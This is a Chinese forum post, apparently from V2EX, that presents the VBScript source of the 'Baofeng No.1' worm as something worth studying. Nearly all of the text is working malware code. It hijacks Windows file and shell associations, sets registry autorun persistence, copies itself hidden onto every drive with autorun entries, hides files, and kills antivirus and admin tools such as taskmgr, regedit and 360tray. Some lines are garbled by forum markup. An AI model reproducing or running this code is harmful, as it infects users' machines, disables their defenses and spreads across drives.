暴风一号病毒源代码,一些杀毒软件又称“ 1K 快捷方式病毒”,是一个大学生的闲暇之作。值得研究学习, VBS 病毒的鼻祖是马尼拉 AMA 计算机大学的学生编写的“爱虫”病毒。很久了。
On Error Resume Next
Dim Fso,Wshshell
Set Fso = CreateObject("Scripting.Filesystemobject")
Set Wshshell = CreateObject("Wscript.Shell")
Call Main()
Sub Main()
On Error Resume Next
Dim Args, VirusLoad, VirusAss
Set Args = WScript.Arguments
VirusLoad = GetMainVirus(1)
VirusAss = GetMainVirus(0)
ArgNum = 0
Do WhileArgNum < Args.Count
Param = Param & " " & Args(ArgNum)
ArgNum = ArgNum + 1
Loop
SubParam = LCase(Right(Param, 3))
Select Case SubParam
Case "run"
RunPath = Left(WScript.ScriptFullName, 2)
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "txt", "log","ini" ,"inf"
RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Param
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "bat", "cmd"
RunPath = "CMD /c echo Hi!I'm here!&pause"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "reg"
RunPath = "regedit.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "chm"
RunPath = "hh.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "hlp"
RunPath = "winhlp32.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "dir"
RunPath = """" & Left(Trim(Param),Len(Trim(Param)) - 3) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "oie"
RunPath = """%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "omc"
RunPath = "explorer.exe / n,
{20D04FE0 - 3AEA - 1069 - A2D8 - 08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "emc"
RunPath = "explorer.exe / n, / e,
{20D04FE0 - 3AEA - 1069 - A2D8 - 08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case Else
If PreDblInstance = True Then
WScript.Quit
End If
Call MonitorSystem()
End Select
End Sub
Sub MonitorSystem()
On Error Resume Next
Dim ProcessNames, ExeFullNames
ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr","regedit.pif", "regedit.com", "msconfig.exe")
VBSFullNames = Array(GetMainVirus(1))
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))
Call KeepProcess(VBSFullNames)
WScript.Sleep 3000
Loop
End Sub
Sub InvadeSystem(VirusLoadPath,VirusAssPath)
On Error Resume Next
Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
Load_Value = "%SystemRoot%\system\svchost.exe " & """" & VirusLoadPath & """"
File_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " %1 %* "
IE_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OIE "
MyCpt_Value1 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OMC "
MyCpt_Value2 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " EMC "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
HCUVer = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
HCUDate = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
VirusCode = GetCode(WScript.ScriptFullName)
Version = 1
HostSourcePath = Fso.GetSpecialFolder(1) & "\Wscript.exe"
HostFilePath = Fso.GetSpecialFolder(0) & "\system\svchost.exe"
For Each Drive In Fso.Drives
If Drive.IsReady And (Drive.DriveType = 1 Or Drive.DriveType = 2 Or Drive.DriveType = 3) Then
DiskVirusName = GetSerialNumber(Drive.DriveLetter) & ".vbs"
Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
Call InfectRoot(Drive.DriveLetter,DiskVirusName)
End If
Next
If FSO.FileExists(VirusAssPath) = False Or FSO.FileExists(VirusLoadPath) = False Or FSO.FileExists(HostFilePath) = False Or GetVersion() < Version Then
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
Call CreateFile(VirusCode,VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call CopyFile(HostSourcePath,HostFilePath)
Call SetHiddenAttr(HostFilePath)
Else
Call CreateFile(VirusCode, VirusAssPath)
Call SetHiddenAttr(VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call SetHiddenAttr(VirusLoadPath)
Call CopyFile(HostSourcePath, HostFilePath)
Call SetHiddenAttr(HostFilePath)
End If
End If
If ReadReg(HCULoad) <> Load_Value Then
Call WriteReg (HCULoad, Load_Value, "")
End If
If GetVersion() < Version Then
Call WriteReg (HCUVer, Version, "")
End If
If GetInfectedDate() = "" Then
Call WriteReg (HCUDate, Date, "")
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\") <> File_Value Then
Call SetTxtFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\") <> File_Value Then
Call SetIniFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\") <> File_Value Then
Call SetInfFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\") <> File_Value Then
Call SetBatFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\") <> File_Value Then
Call SetCmdFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\") <> File_Value Then
Call SetRegFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\") <> File_Value Then
Call SetchmFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\") <> File_Value Then
Call SethlpFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\") <> MyCpt_Value1 Then
Call SetMyComputerAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\") <> MyCpt_Value2 Then
Call SetMyComputerAss(VirusAssPath)
End If
Call RegSet()
End Sub
Sub CopyFile(source, pathf)
On Error Resume Next
If FSO.FileExists(pathf) Then
FSO.DeleteFile pathf , True
End If
FSO.CopyFile source, pathf
End Sub
Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText = FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText = FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub RegSet()
On Error Resume Next
Dim RegPath1 , RegPath2, RegPath3, RegPath4
RegPath1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"
RegPath2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
RegPath3 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
RegPath4 = "HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
Call WriteReg (RegPath1, 3, "REG_DWORD")
Call WriteReg (RegPath2, 2, "REG_DWORD")
Call WriteReg (RegPath3, 0, "REG_DWORD")
Call DeleteReg (RegPath4)
End Sub
Sub KillProcess(ProcessNames)
On Error Resume Next
Set WMIService = GetObject("winmgmts
[url = file
/ / \ \ . \ root \ cimv2] \ \ . \ root \ cimv2[ / url]")
For Each ProcessName In ProcessNames
Set ProcessList = WMIService.execquery(" Select * From win32_process where name ='" & ProcessName & "' ")
For Each Process In ProcessList
IntReturn = Process.terminate
If intReturn <> 0 Then
WshShell.Run "CMD /c ntsd -c q -p " & Process.Handle, vbHide, False
End If
Next
Next
End Sub
Sub KillImmunity(D)
On Error Resume Next
ImmunityFolder = D & "
\ Autorun.inf"
If Fso.FolderExists(ImmunityFolder) Then
WshSHell.Run ("CMD /C CACLS " & """" & ImmunityFolder & """" & " / t / e / c / g everyone
f"),vbHide,True
WshSHell.Run ("CMD /C RD /S /Q " & ImmunityFolder), vbHide, True
End If
End Sub
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.